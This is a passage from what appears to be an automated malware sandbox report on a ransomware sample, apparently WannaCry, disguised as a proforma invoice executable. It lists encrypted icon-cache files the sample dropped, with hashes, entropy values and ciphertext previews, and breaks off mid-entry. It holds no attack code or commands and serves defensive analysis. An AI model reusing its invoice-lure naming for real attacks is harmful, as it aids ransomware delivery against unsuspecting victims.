                                                          Preview:WANACRY!.....G:..v%.d=X.f.XY.#..\Jn.H..%...l.....k...^>..&.t.%b..1Z.i.c4A.i[?..."q.../K.........-..U.9].R Y.=.W.......).:}...T.,..eL...J...qs$P...t.&h.....1......`....5~Z.".....g.J0%/u8.~..0.1.^.8a...x...x.....r............v.+..9.j...H.D.[.nX...C.N...IY...... .....p..$...T..-...L..T..,..h..+.3..=._k. ..?B..pz{.......M1sNw..o.kI......f.?.M..x....T...E...?e.c.A_..2..y..8.M>......PS..+~..79..e..^.... .....t...o,m.7s.......%.%<<&&O..|x.....J....)..|..o.[..../^.V..K........3X....^...|6f....g^...e.=h...!..W...kU...|.Z....7...mS3....+.NA.QD.o`.._._..k....N.>R..C..N.r^.h#8..+....V..J..!..................x.......-.>\..N..2..Q;.........[.BH.F>4.l.W.p.{A,.3...~.Y.zf.G....u...q.......[..N...e.7..G{..r.<.*.8..Q'C{.)%.&..k...M.hJ.-wOg&...|...C84.\"{...l(P:._B[.s....#m.......0.....}..<...)..a..2.XgQ...an...W.....?.PA...v...q$L.......Q..%-....5...C...5d{t.......1..t.].:#..uH.0.....m.)...r..R\..........u.~......o....jc..J<g...*.A...R.... .._..>

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2097432
                                                          Entropy (8bit):7.999915491206557
                                                          Encrypted:true
                                                          SSDEEP:49152:eIEp/9o5rXdbb+u6CLeoPx4F56OrJ1qh2gJJap:eIEplo5BrB5iEOl1qIEcp
                                                          MD5:10E7546DAC27A4B72B332BDA6FA5B433
                                                          SHA1:939DDD8170AC1106FAD9E76C1CE51752E2E1BE38
                                                          SHA-256:81FE1D79B289FCC5334C71EDAAB1EF66AEB526832AED0C18327F31E9C7DF0B16
                                                          SHA-512:5987F3D765925AC4B75454D25D53FFD30638596C52DF81639D93EE6D0320D07D65C626928DCE6E358B288621BF1D74B00E597D5337115ACA15AF411A77397A68
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....G:..v%.d=X.f.XY.#..\Jn.H..%...l.....k...^>..&.t.%b..1Z.i.c4A.i[?..."q.../K.........-..U.9].R Y.=.W.......).:}...T.,..eL...J...qs$P...t.&h.....1......`....5~Z.".....g.J0%/u8.~..0.1.^.8a...x...x.....r............v.+..9.j...H.D.[.nX...C.N...IY...... .....p..$...T..-...L..T..,..h..+.3..=._k. ..?B..pz{.......M1sNw..o.kI......f.?.M..x....T...E...?e.c.A_..2..y..8.M>......PS..+~..79..e..^.... .....t...o,m.7s.......%.%<<&&O..|x.....J....)..|..o.[..../^.V..K........3X....^...|6f....g^...e.=h...!..W...kU...|.Z....7...mS3....+.NA.QD.o`.._._..k....N.>R..C..N.r^.h#8..+....V..J..!..................x.......-.>\..N..2..Q;.........[.BH.F>4.l.W.p.{A,.3...~.Y.zf.G....u...q.......[..N...e.7..G{..r.<.*.8..Q'C{.)%.&..k...M.hJ.-wOg&...|...C84.\"{...l(P:._B[.s....#m.......0.....}..<...)..a..2.XgQ...an...W.....?.PA...v...q$L.......Q..%-....5...C...5d{t.......1..t.].:#..uH.0.....m.)...r..R\..........u.~......o....jc..J<g...*.A...R.... .._..>

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999820846645787
                                                          Encrypted:true
                                                          SSDEEP:24576:GtClQOREBhXT1vr7HSb1EA8+lEdn7yCQgp7SbHI6pjH8XjC58FT/S:GtCln6hEb1EfOWnVQgp7sZZHejC58A
                                                          MD5:885E75691133AA4A093DFE37F396A5F6
                                                          SHA1:77DCF0D62B91918C4B16BD9F7414142E1EF5DE87
                                                          SHA-256:E3A8F15A8B5ADF2A97A96AE396F233013D098A903B9A1292A887421A1A3251F4
                                                          SHA-512:A2AED9714C1418E007AE6B7B8B452066E8DD1E2F622E63B29897ED37DB7B6C1F3E336DC8204DFB136410C02E1C115E87D9E48368D934A5446DC7930F050FA1CB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....g.Wz.I4.G.s..nF.O..t..{.....j.PD=..*.q..]B..... ..u.m.V6..$n.........f..j.<@O...`I..........<u......D.....W.J...U."..Bv.k-..<..,Z.A..H.......Mq.~...*..YE..o...D..^..c.....<..&.4.a......p@...T._.....O}.....f.. ..Uc+3.o.=r`...*.6Q.vOu.............s._.M.......:pf7....e..7.........:..b.a.z..........9L.}Y.M.7zt. Vq...&z.X.8.%....l. .7xI.f..U.[.?.w#.!.>. .Zi...[.u4.h..sR.o.,.}.9...I.R..>..Du.F.a...(.E...iL?....rO0..Nb....Gh@.....g=.*...#..Zz.Z............t..Yx!.U. w...pN.]Wr...\~.h..~1L.......)m(.U..`@9?a!5....]. .^^.<^....G...^....xK.. \........K..V..1./^.....$......m.bX..q...i.AY!"..&.*..,..q.......E.{.r.8..g..s!.......?V....1....x..S......&.....k`...=.(.v.!..{%{n.~.............).L.rm.....@.w..j.....N.Uo..f<.#............`.K..=k..:BE<<.._.)....;?....lfj.q..}-..E...zL?X..CD....W......IH..m..\WsGv.....I..c.0.x!..o..a_.C.`..w.:....)...C.m.U..W,........C.2.\+..M..D..bGA......\L.....Wa+.u4.[H.r{....r/W..dK.C..-/..\.........

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999820846645787
                                                          Encrypted:true
                                                          SSDEEP:24576:GtClQOREBhXT1vr7HSb1EA8+lEdn7yCQgp7SbHI6pjH8XjC58FT/S:GtCln6hEb1EfOWnVQgp7sZZHejC58A
                                                          MD5:885E75691133AA4A093DFE37F396A5F6
                                                          SHA1:77DCF0D62B91918C4B16BD9F7414142E1EF5DE87
                                                          SHA-256:E3A8F15A8B5ADF2A97A96AE396F233013D098A903B9A1292A887421A1A3251F4
                                                          SHA-512:A2AED9714C1418E007AE6B7B8B452066E8DD1E2F622E63B29897ED37DB7B6C1F3E336DC8204DFB136410C02E1C115E87D9E48368D934A5446DC7930F050FA1CB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....g.Wz.I4.G.s..nF.O..t..{.....j.PD=..*.q..]B..... ..u.m.V6..$n.........f..j.<@O...`I..........<u......D.....W.J...U."..Bv.k-..<..,Z.A..H.......Mq.~...*..YE..o...D..^..c.....<..&.4.a......p@...T._.....O}.....f.. ..Uc+3.o.=r`...*.6Q.vOu.............s._.M.......:pf7....e..7.........:..b.a.z..........9L.}Y.M.7zt. Vq...&z.X.8.%....l. .7xI.f..U.[.?.w#.!.>. .Zi...[.u4.h..sR.o.,.}.9...I.R..>..Du.F.a...(.E...iL?....rO0..Nb....Gh@.....g=.*...#..Zz.Z............t..Yx!.U. w...pN.]Wr...\~.h..~1L.......)m(.U..`@9?a!5....]. .^^.<^....G...^....xK.. \........K..V..1./^.....$......m.bX..q...i.AY!"..&.*..,..q.......E.{.r.8..g..s!.......?V....1....x..S......&.....k`...=.(.v.!..{%{n.~.............).L.rm.....@.w..j.....N.Uo..f<.#............`.K..=k..:BE<<.._.)....;?....lfj.q..}-..E...zL?X..CD....W......IH..m..\WsGv.....I..c.0.x!..o..a_.C.`..w.:....)...C.m.U..W,........C.2.\+..M..D..bGA......\L.....Wa+.u4.[H.r{....r/W..dK.C..-/..\.........

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.221989408165668
                                                          Encrypted:false
                                                          SSDEEP:6:bkE3GbURWSi2dmf9OZ7fzQg8lFWJFpo2bze2M4ecvNVlw/+ThllYmdTA4i:bkE3GEWS+f9Ohrr8fWLpo6LvlAelmmji
                                                          MD5:8A5AEBC1F4E31BB94F234BBC3B9B44A7
                                                          SHA1:E94DAFE8D1EDD35CC23D58EC7502A61467B116D6
                                                          SHA-256:09B5583410211F14B06037050D79EBA659BF35F6F619CEB4A982727CBBF2EFF6
                                                          SHA-512:3ED462060E92F0188411A759A76D6A9B56236596909714178858BE0C6B49560954220CB880E03F59B9AB2A96C6F29B5C0CD543A65D967C6F5AF1D40661E2DC90
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....=..sq.!8sf.C.......e..i,I.T.n.=.L...%...$Z..7.dj...Yh_....=......G...Tj.8...>.V...4|.e{..{.d..@~Q.!h.*..**Gs...@l-..`sL+..KU.BT*.$>;....6.|5.n....B....CEwf0d...tfb@>./.........K...#..;S.....@.e.&...T.......P..`...L.."6.#..|B......Z.}[..#1\.U.(4...............fO..z........F-..K..Z..;.....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.221989408165668
                                                          Encrypted:false
                                                          SSDEEP:6:bkE3GbURWSi2dmf9OZ7fzQg8lFWJFpo2bze2M4ecvNVlw/+ThllYmdTA4i:bkE3GEWS+f9Ohrr8fWLpo6LvlAelmmji
                                                          MD5:8A5AEBC1F4E31BB94F234BBC3B9B44A7
                                                          SHA1:E94DAFE8D1EDD35CC23D58EC7502A61467B116D6
                                                          SHA-256:09B5583410211F14B06037050D79EBA659BF35F6F619CEB4A982727CBBF2EFF6
                                                          SHA-512:3ED462060E92F0188411A759A76D6A9B56236596909714178858BE0C6B49560954220CB880E03F59B9AB2A96C6F29B5C0CD543A65D967C6F5AF1D40661E2DC90
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....=..sq.!8sf.C.......e..i,I.T.n.=.L...%...$Z..7.dj...Yh_....=......G...Tj.8...>.V...4|.e{..{.d..@~Q.!h.*..**Gs...@l-..`sL+..KU.BT*.$>;....6.|5.n....B....CEwf0d...tfb@>./.........K...#..;S.....@.e.&...T.......P..`...L.."6.#..|B......Z.}[..#1\.U.(4...............fO..z........F-..K..Z..;.....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.34758026407924
                                                          Encrypted:false
                                                          SSDEEP:6:bkExYQLygCxdUob7gTFBoZaNcU7d4CAYiv2XftJlRzSovcF:bkE3ZC9q+GtcuXf2ovcF
                                                          MD5:5E0652D4CF1E0F3073B0ACF1961FB839
                                                          SHA1:221265C7822749BE8F941C68440FB88D9DA13D9E
                                                          SHA-256:8E78EF4ECD2E7E2FB2CE907A8942455900605CBD7796A34AEF316173BE75CC84
                                                          SHA-512:79A66B6A676D2D3BF0E065EDBADD456630BE77B2F92BFF8D1961E75D206821E503306A228C3A039B3C5DEFC187A86B4BB9663C591E0213FFE082190FD3FD7EC9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......n..8.U-..?:;t...:.......|U.....F.Z@...M..S.v.r.u..z..^..M...o.n.9......[b..+HdD....8.e...Fv..`...\}.M.B..3..j..Zj9........G_R...gO.X7V]p...h.ywt.Q.)y.Vvs..,a4rE.U.g..=.Y.)...K.M.5f.\u.T....n"[g.S.8...T..0.........:7....,2............._...............W..x............s..%..wm......

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.34758026407924
                                                          Encrypted:false
                                                          SSDEEP:6:bkExYQLygCxdUob7gTFBoZaNcU7d4CAYiv2XftJlRzSovcF:bkE3ZC9q+GtcuXf2ovcF
                                                          MD5:5E0652D4CF1E0F3073B0ACF1961FB839
                                                          SHA1:221265C7822749BE8F941C68440FB88D9DA13D9E
                                                          SHA-256:8E78EF4ECD2E7E2FB2CE907A8942455900605CBD7796A34AEF316173BE75CC84
                                                          SHA-512:79A66B6A676D2D3BF0E065EDBADD456630BE77B2F92BFF8D1961E75D206821E503306A228C3A039B3C5DEFC187A86B4BB9663C591E0213FFE082190FD3FD7EC9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......n..8.U-..?:;t...:.......|U.....F.Z@...M..S.v.r.u..z..^..M...o.n.9......[b..+HdD....8.e...Fv..`...\}.M.B..3..j..Zj9........G_R...gO.X7V]p...h.ywt.Q.)y.Vvs..,a4rE.U.g..=.Y.)...K.M.5f.\u.T....n"[g.S.8...T..0.........:7....,2............._...............W..x............s..%..wm......

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.2431662097912834
                                                          Encrypted:false
                                                          SSDEEP:6:bkEvvnh9ZI68ijw7eGRxk5nErgix/oEMixQKgjjkkPKUDsgjUk:bkEv7jcemIErZ/o6xQKTk7AeUk
                                                          MD5:D309395EA6F219676AA25CB11111E175
                                                          SHA1:64FC3758DBF8C029528F324B06D51182EF70BAB0
                                                          SHA-256:BBA72DAE48CAAA2BFDBB09433EA000B52A9599EE446F7177E73F94EB57A58BAA
                                                          SHA-512:0E94A3469384AA1B850760DAC0B44359538864DA14585D4B9E671A1A9EFAFCEC8E79748F3C2FC1103769E64FE5C48193BB74E77D04B46B0D8F7B253F66ED5CF6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......5?....Q.....Q. F*.:..Y.C..].O....9x..b)..{3.^%...)...KA&..0..A..zq...H.z5....4.E#..T...z.....c:.....3.....N`.O..w*.s!..j..!u.<......o....C....6.=fR'........9...:;8.\...-*....`.....X..t5Z..q..@..]).i...U....e4.'6a.lA.%k.L..jc......j...a.<......................(.....]..q.._....E.BF....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.2431662097912834
                                                          Encrypted:false
                                                          SSDEEP:6:bkEvvnh9ZI68ijw7eGRxk5nErgix/oEMixQKgjjkkPKUDsgjUk:bkEv7jcemIErZ/o6xQKTk7AeUk
                                                          MD5:D309395EA6F219676AA25CB11111E175
                                                          SHA1:64FC3758DBF8C029528F324B06D51182EF70BAB0
                                                          SHA-256:BBA72DAE48CAAA2BFDBB09433EA000B52A9599EE446F7177E73F94EB57A58BAA
                                                          SHA-512:0E94A3469384AA1B850760DAC0B44359538864DA14585D4B9E671A1A9EFAFCEC8E79748F3C2FC1103769E64FE5C48193BB74E77D04B46B0D8F7B253F66ED5CF6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......5?....Q.....Q. F*.:..Y.C..].O....9x..b)..{3.^%...)...KA&..0..A..zq...H.z5....4.E#..T...z.....c:.....3.....N`.O..w*.s!..j..!u.<......o....C....6.=fR'........9...:;8.\...-*....`.....X..t5Z..q..@..]).i...U....e4.'6a.lA.%k.L..jc......j...a.<......................(.....]..q.._....E.BF....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.285689097207108
                                                          Encrypted:false
                                                          SSDEEP:6:bkEZIxia0mTHrIyl3Z5ysz6sGye2gyfKX0Q4MNGT18jWgIY:bkEZIxXTlpOs6yet0jmgqRIY
                                                          MD5:5F47A8DA19304B97799DCEE5BDE979F0
                                                          SHA1:652A0AACEC779D1AD3A9EC7F5DC4C559A79FF692
                                                          SHA-256:0EBB3680EBB08CE8B9D62A30049CDFB62F72E8DEDE7331931103648B56C3C3E6
                                                          SHA-512:6944CC034C5723EDB55C29DF6FDD3F7EDB55B5598E9F7EDA3670AFB78ABC643470FD27471839E9BFA653853A7FD2DFA4661DF226253ADEBE90910FE356C74C3B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...... ...$...........M..e..}..h....o.[8.$B......j. ....(~.L.W.@zC..1.,.........@..~..I.V...c..Z.'..".e..<A.9.NK...a.....+14..m.d.....I.V....V.f:.,.i.EU..3........dlQ.;......:.._i...p.-....b.v.....{Y..................F.D&..d....4...f"".#..R................>.Ba/A...].......+..L.x.cuq_+P=

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.285689097207108
                                                          Encrypted:false
                                                          SSDEEP:6:bkEZIxia0mTHrIyl3Z5ysz6sGye2gyfKX0Q4MNGT18jWgIY:bkEZIxXTlpOs6yet0jmgqRIY
                                                          MD5:5F47A8DA19304B97799DCEE5BDE979F0
                                                          SHA1:652A0AACEC779D1AD3A9EC7F5DC4C559A79FF692
                                                          SHA-256:0EBB3680EBB08CE8B9D62A30049CDFB62F72E8DEDE7331931103648B56C3C3E6
                                                          SHA-512:6944CC034C5723EDB55C29DF6FDD3F7EDB55B5598E9F7EDA3670AFB78ABC643470FD27471839E9BFA653853A7FD2DFA4661DF226253ADEBE90910FE356C74C3B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...... ...$...........M..e..}..h....o.[8.$B......j. ....(~.L.W.@zC..1.,.........@..~..I.V...c..Z.'..".e..<A.9.NK...a.....+14..m.d.....I.V....V.f:.,.i.EU..3........dlQ.;......:.._i...p.-....b.v.....{Y..................F.D&..d....4...f"".#..R................>.Ba/A...].......+..L.x.cuq_+P=

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58600
                                                          Entropy (8bit):7.996326357278634
                                                          Encrypted:true
                                                          SSDEEP:1536:TUbyK/u+Uu0KXfgJj6PFU2w0Sh3RHs7zwiGJw+FOWBi:Tv4aJ2gJj6Nw0w3Zwzw/Jt3i
                                                          MD5:03084939EBD92085C88EAEC0ECF20C3C
                                                          SHA1:81EDF1CC7C0BCA678E7C337A045DBD27C6F0F626
                                                          SHA-256:C25D73CDA82A382B15C2720C893C3490CBAE86304014B3F01CC08F988CD78C66
                                                          SHA-512:608A09861CBA2912D9BFB7D779EA99D838758AFEC855FDF5A4B59A193BC049623348DE0B20820480015A2A62CEF5FBC0F433742B8BE9E6D624F657B7C1222692
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....r.i..r...ZA...V.{7}.........Sn...<..L)LX.A..dK..#)....o.F>f....A.?b*.uVg.f.%...M.E.i;..0......I..}.]L........-z.).~..+HM.....,..o/...5..N..j(0...:).=.. >.~c.vO.\``....._.kdn..;...1...%.....>..... .........R.N.._.u.q. ..S..../k.p]K.!..">4._.Xr............n....!..,...V..7%cr.Y...tkO..w".Q...9....*..L........].........@.y..d..f9p.U........V..f..L*..r..x..V......KW.U{J..~..n.;..~.$....>.`W.....]z..^..I.b 5.'.Z.u......u.Kq@.4(..T.............../....>....n.7.y..F...O..$.i....w4..E,d....Z.N *@..8.........M.#....+@..2@...N.Lxr.#......5l..].Z......7......E.......i..A....(.6..s.z.F..j......p.x.>..sJ_.g.^..Z...95]8L..B..P!...;..D..Q..]r.g.........>.m...l.e..g..B..eX.AR.)..9..;tXO...i;....!r+^.M. ..D...{.YB..q.....Y3.|.8...`...i.=...".`..!r....G.@..5...z.W...n.}. ......?..=.#3`i$pT..$...]..:...P~e].za.p..E{9.p~......+2A*k....x.7g...v...=" .@.)O.Z........M.<~.?9............L..!B....39>q.....N.m.)..-:c..=*>.......+.;..Xg.N.@....F.c|.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):58600
                                                          Entropy (8bit):7.996326357278634
                                                          Encrypted:true
                                                          SSDEEP:1536:TUbyK/u+Uu0KXfgJj6PFU2w0Sh3RHs7zwiGJw+FOWBi:Tv4aJ2gJj6Nw0w3Zwzw/Jt3i
                                                          MD5:03084939EBD92085C88EAEC0ECF20C3C
                                                          SHA1:81EDF1CC7C0BCA678E7C337A045DBD27C6F0F626
                                                          SHA-256:C25D73CDA82A382B15C2720C893C3490CBAE86304014B3F01CC08F988CD78C66
                                                          SHA-512:608A09861CBA2912D9BFB7D779EA99D838758AFEC855FDF5A4B59A193BC049623348DE0B20820480015A2A62CEF5FBC0F433742B8BE9E6D624F657B7C1222692
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....r.i..r...ZA...V.{7}.........Sn...<..L)LX.A..dK..#)....o.F>f....A.?b*.uVg.f.%...M.E.i;..0......I..}.]L........-z.).~..+HM.....,..o/...5..N..j(0...:).=.. >.~c.vO.\``....._.kdn..;...1...%.....>..... .........R.N.._.u.q. ..S..../k.p]K.!..">4._.Xr............n....!..,...V..7%cr.Y...tkO..w".Q...9....*..L........].........@.y..d..f9p.U........V..f..L*..r..x..V......KW.U{J..~..n.;..~.$....>.`W.....]z..^..I.b 5.'.Z.u......u.Kq@.4(..T.............../....>....n.7.y..F...O..$.i....w4..E,d....Z.N *@..8.........M.#....+@..2@...N.Lxr.#......5l..].Z......7......E.......i..A....(.6..s.z.F..j......p.x.>..sJ_.g.^..Z...95]8L..B..P!...;..D..Q..]r.g.........>.m...l.e..g..B..eX.AR.)..9..;tXO...i;....!r+^.M. ..D...{.YB..q.....Y3.|.8...`...i.=...".`..!r....G.@..5...z.W...n.}. ......?..=.#3`i$pT..$...]..:...P~e].za.p..E{9.p~......+2A*k....x.7g...v...=" .@.)O.Z........M.<~.?9............L..!B....39>q.....N.m.)..-:c..=*>.......+.;..Xg.N.@....F.c|.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.24745326224425
                                                          Encrypted:false
                                                          SSDEEP:6:bkEZjHCWqspjTA7PwTj94MSvzwS8eTqBLsG424a5zsv9RotiZWQ7:bkEZW4pzTmVvdbELD4la5Aet+7
                                                          MD5:B3706A2EF9A68D3B0F0C00531E573C2D
                                                          SHA1:B4C95FD3C294FABA7966C814B9FFB5A459B010B3
                                                          SHA-256:78BE913525446EF4B2191190507A212B11F7814A303BE208C227AC2F863CD177
                                                          SHA-512:FD8D28B85D111710A61DC2CB7260B56FC074F2E9F1A1BD385164F7C78CC75273530F72EB3D232D8B801B0CEA5E5478A8BB3B79AA4889B3408757ECACB79CE27A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&..Os.~Bu.R.i.!....>*.......p.e..S...\.Lh.M....m....Sp.".XX..*.o.^...E2.}=..F.|.2...E.....GB..HU..n\...U.....>...:..7E@....N..[.l..f..@..3.yI.0.S.P....\.,....v.....Q.x.wK...p..e+~.Z..Q^.b.'...s..5.|A.s2..I.g..~o..#.c.Qt.m......$y..............$..........|._...J.ZN...K..eB

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.24745326224425
                                                          Encrypted:false
                                                          SSDEEP:6:bkEZjHCWqspjTA7PwTj94MSvzwS8eTqBLsG424a5zsv9RotiZWQ7:bkEZW4pzTmVvdbELD4la5Aet+7
                                                          MD5:B3706A2EF9A68D3B0F0C00531E573C2D
                                                          SHA1:B4C95FD3C294FABA7966C814B9FFB5A459B010B3
                                                          SHA-256:78BE913525446EF4B2191190507A212B11F7814A303BE208C227AC2F863CD177
                                                          SHA-512:FD8D28B85D111710A61DC2CB7260B56FC074F2E9F1A1BD385164F7C78CC75273530F72EB3D232D8B801B0CEA5E5478A8BB3B79AA4889B3408757ECACB79CE27A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&..Os.~Bu.R.i.!....>*.......p.e..S...\.Lh.M....m....Sp.".XX..*.o.^...E2.}=..F.|.2...E.....GB..HU..n\...U.....>...:..7E@....N..[.l..f..@..3.yI.0.S.P....\.,....v.....Q.x.wK...p..e+~.Z..Q^.b.'...s..5.|A.s2..I.g..~o..#.c.Qt.m......$y..............$..........|._...J.ZN...K..eB

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.1441662029840485
                                                          Encrypted:false
                                                          SSDEEP:6:bkEaR4OPQ0mFrcPQ5YSIwM3YoaAsN7foMBrv8QkfRMdRv7vF:bkEa6w3mFIPcJhN1rv8QgR0NF
                                                          MD5:DE48D88AE01D5EE9DA0D5D21E91B88C4
                                                          SHA1:17A76374E6CD733DC940B46F768B5CA92B31E4D4
                                                          SHA-256:5ED2237D5EA084882646689047A68BCA4AB127800FAE4FB9D8C54BDD05014717
                                                          SHA-512:831E8506B8DC1EB33EE950F9CB2443196E7850D16495BC32A68AA0E7C32E01E2403142D84B45416E8707E1068787AE082F614ADBB3F4D85795E96B4491BB3B8D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....{..X.I.zg.....e..M.Q.\+`s[...t...h.[.........N......+...yL.F..B..?..E....t.%".h.7.....h.x.!....;...2....O.;.........#...).i.*.q....>..!@..)8a.b/S..ff.8.../ln.r.u...J.4.dK...X..29.E.@.e.k...).....jj.r..b...qu.L.K.-.n....J...S.mq.LR?...........!..N............J{W!0F....@.!......=.qy..[j.I...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.1441662029840485
                                                          Encrypted:false
                                                          SSDEEP:6:bkEaR4OPQ0mFrcPQ5YSIwM3YoaAsN7foMBrv8QkfRMdRv7vF:bkEa6w3mFIPcJhN1rv8QgR0NF
                                                          MD5:DE48D88AE01D5EE9DA0D5D21E91B88C4
                                                          SHA1:17A76374E6CD733DC940B46F768B5CA92B31E4D4
                                                          SHA-256:5ED2237D5EA084882646689047A68BCA4AB127800FAE4FB9D8C54BDD05014717
                                                          SHA-512:831E8506B8DC1EB33EE950F9CB2443196E7850D16495BC32A68AA0E7C32E01E2403142D84B45416E8707E1068787AE082F614ADBB3F4D85795E96B4491BB3B8D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....{..X.I.zg.....e..M.Q.\+`s[...t...h.[.........N......+...yL.F..B..?..E....t.%".h.7.....h.x.!....;...2....O.;.........#...).i.*.q....>..!@..)8a.b/S..ff.8.../ln.r.u...J.4.dK...X..29.E.@.e.k...).....jj.r..b...qu.L.K.-.n....J...S.mq.LR?...........!..N............J{W!0F....@.!......=.qy..[j.I...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.221937557171516
                                                          Encrypted:false
                                                          SSDEEP:6:bkEdO8W6olIXLhefuCPrVbQIf7GqdHjBPbBK0uAQkSBO:bkE0961LhWuYrVcIGqhBPb8XffO
                                                          MD5:CD5D0CBB6412E5F98D523AE12D22649F
                                                          SHA1:1B66213B3C495AEB9BE0F9DB3672DAC376AAAA96
